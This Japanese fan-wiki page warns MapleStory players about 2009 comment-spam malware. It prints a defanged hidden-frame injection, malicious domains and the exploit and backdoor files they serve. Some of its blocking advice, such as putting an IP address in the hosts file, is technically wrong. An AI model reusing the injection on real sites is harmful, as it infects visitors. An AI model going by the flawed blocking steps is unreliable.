このページには執筆者の推論も含まれています。
内容が内容だけにこのページは管理人以外は編集できなくしています(凍結)

ブログコメントに怪しい書き込み(2009)

ブログだけじゃないですが・・・

最近ではブログはもちろん、
2chやうちの掲示板にもiframe入りのサイトでウィルスへ感染させようとする書き込みが多いです。


メイプルユーザーをまっすぐに「狙った」と確信できるこれらの書き込みは
現在のパス抜き騒動の原因と考えるのは自然な流れでしょう。

ちなみに、やっぱり犯人は中国圏サイトへ誘導してました。
これによって中国IPの攻撃者がやっていると予想していますが、
まず不思議だったのは、このサイトは中国圏のIPは全弾きなのに
何故中国圏ウイルスURLを張りにこれるのか。

ウィルスを張りにきているIPは日本の接続元なんだけど
このIP(接続元)がVPNかなんかで簡単に入られるようになっているぽい。
211.8.210.189が踏み台と思われるIPなんだけどこのIPの所有者への報告先がどこかわからないんだよねー
分かる人がいたらお願いします。

(2009/10/14追記)
連絡をした所、IPの管理している所より連絡がありました。
対処をして下さるとの事です。
211.8.210.189の他にも日本IPでウィルスを張る所はあると思うのですが、
これで1つのルートがなくなるといいですね。

最近では中国のサイトからの書き込みに敏感に反応するサイトオーナーも多いですが
攻撃者は普通に日本人(のIPを持って)サイトへ侵入し日本語文章を使ってURLを張ってるわけです。おそろしや。


とりあえず防衛するには・・・


<LV1>
PCに詳しくないならIEではなくFire Foxを使おう
嫌ならせめてセキュリティは高。もしくはActiveXは使わない
世の中にはIEで溢れている為、攻撃者はIEを的にしたウィルスサイトを作ります。
IEの脆弱性などに詳しくない方であれば
Fire Foxにする事でそういった危険が減少します。

<LV2>
Fire FoxのアドオンのNo Script等を用いてJava Scriptのアクセス遮断する
ウィルス入りサイトの99%はJava ScriptやIEのActiveX等を使用してウィルスを実行させます。
言ってしまえばJava Scriptさえ遮断すれば99%安全です。
ただし正規なものまで遮断するので、いろいろと面倒ですが。

<LV3>
ウィルス対策ソフトは絶対いれよう
「俺は大丈夫」という自信はどこからくるのかw

<LV4>
可能ならファイアウォールソフトも。
特定のアプリ以外からの送信を制御すれば異常に気づきやすいです。


ちなみに僕の環境はFire Fox+No Script。
ウィルスソフトはAvast4でファイアウォールソフトはSygateです。
でも絶対ではないと思っています。

<LV5>

hostsファイルでサイトに飛ばないようにする。

誘導先のページがワンパターンなのでhostsファイルではじいちゃおう
以下は2chのMaplestoryスレでテンプレ化されてる危険サイトURL。
転載します。

■危険サイトにつきNGWord追加、hostsにて遮断推奨
4gameranking.com
gamepaslog.com
aimeblog.com
geoncities.com
blog20fc2.com
infosueek.w53.okwit.com

とまぁ見慣れたウィルスサイトが続くんですが、
実はこれ 「実態は1個」しかないんです。
つまり2chでテンプレ化されてるこれらのドメインはすべて同じIPへ向かいます

実際に正引きすると全部

61.139.126.53へと向かうドメインであることがわかります。

これを制限すれば、現在メイプル界隈を騒がせてるウィルスサイトのほとんどを防げます。
もちろんそのうち亜種もでてくるでしょうけど・・・
(ちなみに、以前はやったアカウントハックの頃もこのIPのドメイン使ってた。つまり同じ中国業者だと思う)

ってわけでどうやって制限するか、ですけど。

C:\WINDOWS\system32\drivers\etc

にある

hosts

というファイルをメモ帳などで開きます。

127.0.0.1       localhost

と書かれている行の下に

127.0.0.1       61.139.126.53

と追加。
何をやってるかというとこのhostsファイルはDNSの参照よりも早く参照されて
接続の変換などをやってくれます。
127.0.0.1ってのは自分自身のPCをあらわす特別なIPで
http://localhost[外部リンク] と入力すれば自分自身を返すようにあらかじめできています。
これに

127.0.0.1       61.139.126.53

を追加することで、61.139.126.53に接続しようとした場合は、自分自身へ接続するようにして接続を回避します。

(ただ、Fire FoxやウィルスソフトがすでにURL自体を定義にしちゃってるから、ほぼ大丈夫ですけどね。)

最後に余談。

実際にかかってみたので、その手記を。

うちの掲示板に張られた奴↓


36 名前:名無しさん@DropWiki:2009/10/03(土) 12:33:53 ID:ZN7/BvWQ
経験値計算式の修正、詳しくは各種計算式/経験値の計算を参照
http://geoncities■com/wiki/FrontPage/

書き込み者のIPアドレス
指定ドメイン => 「 211008210189.cidr.odn.ne.jp 」
取得ホスト名 => 211008210189.cidr.odn.ne.jp
取得IPアドレス=>  211.8.210.189 (IPv4)

ttp://geoncities■com/wiki/FrontPage/

ここに接続するとwikiwiki.jpのMaple Storyまとめwikiの情報/各種計算式のページへ飛んだ・・・
と思われたが、ソースを見ると

<frameset rows="444,0" cols="*">
<frame src="http://maplematome.wikiwiki.jp/?%BE%F0%CA%F3%2F%B3%C6%BC%EF%B7%D7%BB%BB%BC%B0#l6c34181 " framborder="no" scrolling="auto" noresize       marginwidth="0"margingheight="0">
<frame src="http://www■4gameranking.com/xin/" frameborder="no" scrolling="no"      noresize       marginwidth="0"margingheight="0">
</frameset>


こんな感じ。
見ただけでは2chのメイプルストーリーまとめwikiに接続してるように見えるが
実は2個のページを読み出していて

http://maplematome.wikiwiki.jp/

へつなぎつつ

http://www■4gameranking.com/xin/

へもつなぎにいきます。
これはwikiwiki.jpがセキュリティ的に甘いとかではなく、簡単にできちゃう事です。

ttp://www■4gameranking.com/xin/

いろんなサイトに張られてるURLもだいたいがここへ集約されていってます。
で、気になる中身ですが

Ms06014.htm
Ms07004.js
ani.c
ani.asp?id=1314
Yahoo.htm

というファイルを同時に読み込ませています。

ani.c

ウィルス情報詳細
Ani.C
(2007/3/30)
Ani.Cは、Windowsのアニメーションカーソル・ハンドラであるANIファイルの脆弱性を利用するトロイの木馬であり、システムに他のマルウェアをダウンロードし、インストールします。


とある。つまりー。こいつを使ってまたウイルスをダウンロードするわけだ。
ってわけでこani.cを実行されちゃうとどんなウィルスをダウンロードするか。
中を覗いてみたら

http://www■4gameranking.com/xin/xia■exe


がでてきた。多分、本命はこいつ!!!
さて、どんなファイルがDLされるのだろうか!!!

実行すると BKDR_HUPIGON.BKBとして検出。 C:ドライブ内に以下のファイルをダウンロード +レジスタ値変更とかするみたい。

IO.EXE
cn.exe
win.exe
ms.exe
dos.exe 

動作はバックドア(攻撃者がそのPCへ入れるように対象者のPCに内部からセキュリティホールを作る)を作ったりするらしい

Yahoo.htm

こちらのソースはActiveXの脆弱性をついたもの。
セキュリティホールを利用して任意のコードを実行って奴だと思うけど
ソースみたけど何を実行してるのかわからんちん




以下前回のアカウントハックウィルス騒ぎの奴↓

ブログコメントに怪しい書き込み

発覚は自分の妹のブログへのカキコミでした。
ブログのコメントにこのようなカキコミがありました。

3ヶ月記念動画w
メイプルストーリーぽぷら鯖に生息するカポ(てんこ&風神)
の3ヶ月記念動画w...メイプ ルストーリー カポリン メイメ
www.exbloog.com/7***888/000029.zip
カスミちゃんV3 03/03/2008 Mon URL [ Edit ]


URLは修正済み
気になったので他にも検索すると

No title
メイプル 海賊4次
ニコニコから...メイプル海賊4次
www.exbloog.com/7***888/000029.zip
2008.03.03 Mon l ドワ美ちゃん. URL l 編集


こんなのも。

このzip。解凍すると動画アイコンに偽装したexeファイルだったり、scrだったりします。
明らかに怪しいのでひとまず、virustotalにかけてみましたところわずかに1つかかるのみ。→検索結果[外部リンク]
つまりこのウィルスは現在対応しているウィルスソフトが少なく、検知されないのです。
さらにzip部分ではなく、「www.exbloog.com/7***888/」は、
アクセスするだけで怪しげな挙動を見せたのでさらに注意が必要です。


このような攻撃で、「メイプルユーザー」を狙ったものは初めてかもしれません。

で、かかったらどうなるのよ

自分もわからないので仮想PCで踏んでみた。
解凍して出来たあやしげな.scrを踏むと一気に中国IPにアクセスしはじめました。
SS[外部リンク]
ってわけでトロイで間違いなさそうです。

一般的にはキーロガーって言われているものかと。

この件とは別のウィルスだと思われますが、メイポを狙ったトロイは1月頃からあったようです。
Win32/PSW.OnLineGames.NLE[外部リンク]

ついでに「exbloog」をWhois検索したらwww.bizcn.com (中国のレジストラ?サーバー?)がヒット。
同様に「peacchmax」「livedoor」も検索したら同様の結果だった。
一応結果
指定ドメイン => 「 peacchmax.com 」
  取得ホスト名 => peacchmax.com
  取得IPアドレス=>  61.139.126.53 (IPv4)


  Domain Name: PEACCHMAX.COM
  Registrar: BIZCN.COM, INC.
  Whois Server: whois.bizcn.com
  Referral URL: ttp://www.bizcn.com
  Name Server: NS1.MYHOSTADMIN.NET
  Name Server: NS2.MYHOSTADMIN.NET
  Status: clientdeleteprohibited
  Status: clienttransferprohibited
  Updated Date: 11-dec-2007
  Creation Date: 11-dec-2007
  Expiration Date: 11-dec-2008

メイポ関係のブログコメントのアカウントハックウィルスで使われてるドメインの
ほとんどはwww.bizcn.comで取得されてる模様

オンラインゲームトロイ

この問題のzipを含むURLで検索すると
ラグナロクというオンラインゲームのブログに多く載せられていました。
中にはアダルト関係のページや2chも多くヒット。
まとめると、認識としてラグナロクのキーロガーとして広がっているようです。
「なんだ、メイポ関係ねーじゃん」と思うかもしれないですが、
オンラインゲームの情報収集トロイという意味で大きな違いはない点や、
明らかにスパムとして投稿されているURLを含むコメントが
メイプルに関連した、それもそこまで日本語でおkな文章ではないもので投稿されているという事は
このファイルをメイプルユーザーに踏ませる事が投稿者にとって有益である事の証明です。
今までメイプルを的に絞ったトロイ攻撃は記憶にないですが、今回の件によって
「日本のメイプルユーザーのPASSはWeb上で狙われている」といった認識を持つ必要があると思います。

予防

URLをよく確認しましょう
大手サイトのURLと間違えやすいようなURLを使ってきます。
例えば今回の例ではエキサイトブログのサイト(www.exblog)と間違えやすいように
「www.exbloog」というドメインをウイルス置き場にしている事がわかります。
blogをbloogとしてウイルス置き場にしている場合がほとんどです。
よく確認してください。

誤って踏んでしまった場合の対処は私にはわかりません。
お使いになられているウィルス対策ソフト会社に報告し、
対応してもらう事が一番だと思います。
(ちなみにavast!は2008/3/5現在無反応)

感染を予防するには感染源であるブログへのコメントを規制する事です。
ブログの管理人様は、ブログのカキコミに怪しいURL(exeやzip等)を載せたものがないか常に注意し、
必要であれば、exeやzipといった単語を規制するのがよいと思います。

私自身、これを知ったのがついさきほどで、
確かで豊富な知識を提示できるわけではありませんが、
PC有害なファイルである事は確かです。
一人でも被害に逢われる事のないよう、記事にします。

参考サイト

早速記事になってますね。さすがです。
パス抜きされないために[外部リンク]

私より前にメイポでこの件について注意を呼びかけていた方。
どん☆がばちょ[外部リンク]

ラグナロクのウィルスとして猛威を振るっていた事もあってか、
ラグナロク関連のまとめサイト等には情報が多くよせられていました。
この手のウイルスは総称として「アカウントハックウイルス」と呼ばれているようで
リネージュや他のオンラインゲームでも似た手口であったことから
今回のメイプルストーリーに対する「アカウントハックウイルス」対策について
有益な情報が多いと思いますのでいくつかリンクします。

BSWiki「安全のために」[外部リンク]
リネージュ資料室[外部リンク]
ROアカウントハック対策スレのまとめサイト[外部リンク]

情報募集中

情報提供以外のコメントは削除される恐れがあります。掲示板[外部リンク]をご利用下さい。
質問スレ13[外部リンク] / 雑談スレ12[外部リンク] / ドロップ討論スレ[外部リンク] / 要望・批判スレ2[外部リンク]
--------------------------------------
コメントページを参照

  • blogにて紹介させていただきますので、少々コピペさせていただきます。すみません。 -- [walkon] 2009-10-09 (金) 22:32:28
  • ブログにて紹介させていただきます。コピペします。おねがいします      このような被害が広がらないことを願います。 -- 2009-10-10 (土) 15:46:07
  • クリックしちゃったんですが、とりあえずセキュリティがブロックしてページには飛びませんでした。クリックしてもそのページに飛ばなければ大丈夫なんですか? -- [ヒロ] 2009-10-10 (土) 23:01:16
    • 明らかに遮断されている警告文で止まっていれば大丈夫です。ですが、今後アンチウィルスベンダーでは検出できないものも増えますので、慎重な動きを心がけるべきかと存じます。 -- [せら] 2009-10-10 (土) 23:21:20
      • 返答ありがとうございます。完全に警告文で止まっていたので大丈夫そうです。これからは注意するようにします;; -- [ヒロ] 2009-10-10 (土) 23:37:11
    • セキュリティソフトによって遮断・駆除されたとも思われますが、事後には念のため一度PCをウィルス総スキャンされることをお勧めします。 -- [matrix] 2009-10-11 (日) 08:27:20
      • どもです。スキャンしておきました。 -- [ヒロ] 2009-10-11 (日) 10:06:59
  • Lunascape5ってブラウザが最近目にしますが、こちらのブラウザはFirefoxより安全上問題ないでしょうか? -- [gi] 2009-10-14 (水) 07:06:53
    • るな助はIEコンポーネントです。中身はIEと一緒 -- [rey] 2009-10-19 (月) 00:41:16
      • 同様に プニルもIE -- 2009-10-28 (水) 01:33:11
  • hostsファイルの編集について、内容を変更しました。 -- 管理人 2009-10-15 (木) 23:34:05
  • ボットウィルスに感染したPCは、攻撃者にWebサーバ(踏み台)として悪用される場合があります。そのため、日本IP経由の接続も簡単に可能となります。悪用されないように各自がPCを防御することも大事です。 -- [matrix] 2009-10-16 (金) 14:39:22
    • 自分のパソコンがWebサーバー(踏み台)として悪用されていないかどうかをチェックする簡単な方法として、ブラウザのURL入力欄に『http://127.0.0.1/[外部リンク]』(『』は不要)と入力してアクセスみること。「このページは表示できません」「正常に接続できませんでした」などとブラウザに表示されたら、あなたのパソコンはWebサーバ(踏み台)として悪用されていません。 -- [matrix] 2009-10-16 (金) 14:43:00
      • もしアクセスできたり、「403 Forbidden」など他のエラー表示が出る場合は、すみやかにウイルスを駆除しましょう。また、この簡易チェックで引っかからなかったとしても、定期的にウイルススキャンチェックをしなければならないことは言うまでもありません。 -- [matrix] 2009-10-16 (金) 14:46:02
      • ApacheやIISなどで自ら情報を発信、もしくはXAMPなどでプログラムの開発環境を作っている場合はこの限りではない。127.0.0.1は”自分自身”をあらわすIPアドレスで、このコメント者は自分自身に接続してみて情報がオープンであれば危険を疑うべきといっているが、普通にPort80を使うプログラムは存在するため、「外部から見れるか」のほうが重要。 よってちゃんと調べるなら、確認くんなどのサイトで自分のグローバルIPを調べて、http://グローバルIP へ完全に外部(携帯とか)から接続を試すのが一番確実です。ただこれでも=ウィルスにかかっているとはいいがたいと思いますが。 -- 2010-06-23 (水) 23:52:45
  • この罠にまんまとかかり、キャラ全部消されました。みなさんもお気をつけて.... -- [グレー] 2009-11-02 (月) 22:22:04
  • 自分の nexon id 憶えてないのに nexonポイントだけ取られました。 -- 2009-11-08 (日) 09:02:48
    • パスワードも覚えていません、(登録時のみ使用) LV3(ariva、spybot)までの対策はしてたのに -- 2009-11-08 (日) 09:09:07
      • いま立ち上げてみたら物が一個売れていてnexonポイントが元に戻っていました、バグみたいです。すみません -- 2009-11-08 (日) 14:08:13
  • インフルとウイルスをくらべんなよ・・・。 -- 2009-12-13 (日) 12:24:27
  • 昨日、久しぶりに、当サイトに来て、クリムゾンのマップや武器作成の辺りのところを見ていたら、突然、ウイルスバスター発動で「個人情報ブロックされました」と、出ました><びっくりして、即閉じちゃいました。 こちらのサイトしか開いてなかったので、何か仕掛けられてるのかもデス><; PCに詳しくないのでこれ以上の事は、わかりません><。ブロックされてたサイトはgoogle○○だったと。。。><。今日再度、見てみましたがウイルスバスターは発動しなかった。。。一応お知らせまでです><;もし、此方のサイトは関係なかったらスミマセンです。 -- [元 楓の住人] 2010-01-27 (水) 16:25:35
    • 昨日のログをすべて洗いましたがウィルスといった感染は確認されていません。となると原因は広告です。当サイトは運営を続けるために広告を出していますが、この広告がgoogleさんのシステムを使っています。googleさんは僕のホームページに合う広告を自動的にローテーションしながら挿入してくれているのですが、広告をクリックされた数によってお金の流れがあるためクッキーといった個人情報を一時的に取得しているのかもしれません。おそらくウィルス対策ソフトはこれに反応したのかと思われます。 -- 管理人 2010-01-27 (水) 22:54:35
  • それは今いろいろなブログにウイルスを打ち込む『ウイルスカイザー』の仕業だと僕は考えます「ショウーkunn」のブログでウイルスが出た事件がありましたよね?それも僕はウイルスカイザーの仕業だと思っていますウイルスカイザーは有名なサイトを狙っていますそして立て続けにメイプルのプレイヤーを襲うということは ウイルスカイザー=メイプルをやっている?=パス抜きされる可能性が高い ということだと思います十分警戒して冷静な対処をとりましょう!お気をつけて! -- [GOMぱっちん] 2010-03-06 (土) 15:28:49
  • ブログにて紹介させていただきます。一部引用させていただきます。 -- 2010-05-02 (日) 23:50:03
  • ここ見とけばよかった・・・・・もちろんやられました・・・・orz 参考にさせていただきます -- [s] 2010-08-03 (火) 22:11:15
  • 参考にさせていただきます。また、被害者をへらす為にも僕のブログにコピペさせてもらいました。ありがとうございます。 -- [すごい] 2010-10-10 (日) 20:31:13
  • http://127.0.0.1/[外部リンク]』をGoogle Chromeのシークレットウインドウで見たところ真っ白な画面になりました。ですが普通に見たところリンクが無効と出ましたのでチェックする際はシークレットウインドウなどからではなく普通のウインドウからアクセスしたほうがいいです -- 2012-02-29 (水) 21:13:28
お名前: